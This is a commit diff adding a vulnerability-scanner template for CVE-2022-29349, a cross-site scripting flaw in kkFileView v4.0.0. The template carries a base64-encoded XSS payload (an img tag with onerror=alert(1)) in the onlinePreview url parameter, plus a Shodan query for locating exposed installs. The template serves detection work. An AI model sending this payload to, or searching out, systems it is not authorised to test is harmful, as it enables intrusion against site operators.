Create CVE-2022-29349.yaml
parent
b867ed6ef5
commit
1c18fea5e7
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2022-29349
|
||||
|
||||
info:
|
||||
name: kkFileView v4.0.0 - Cross Site Scripting
|
||||
author: arafatansari
|
||||
severity: medium
|
||||
description: |
|
||||
kkFileView v4.0.0 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java.
|
||||
reference:
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29349
|
||||
- https://github.com/kekingcn/kkFileView/issues/347
|
||||
metadata:
|
||||
shodan-query: http.html:"kkFileView"
|
||||
verified: "true"
|
||||
tags: xss,cve,2022
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /onlinePreview?url=aHR0cDovL3d3dy54eHguY29tL3h4eC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPjEyMw%3D%3D HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- '"><img src=111 onerror=alert(1)>'
|
Loading…
Reference in New Issue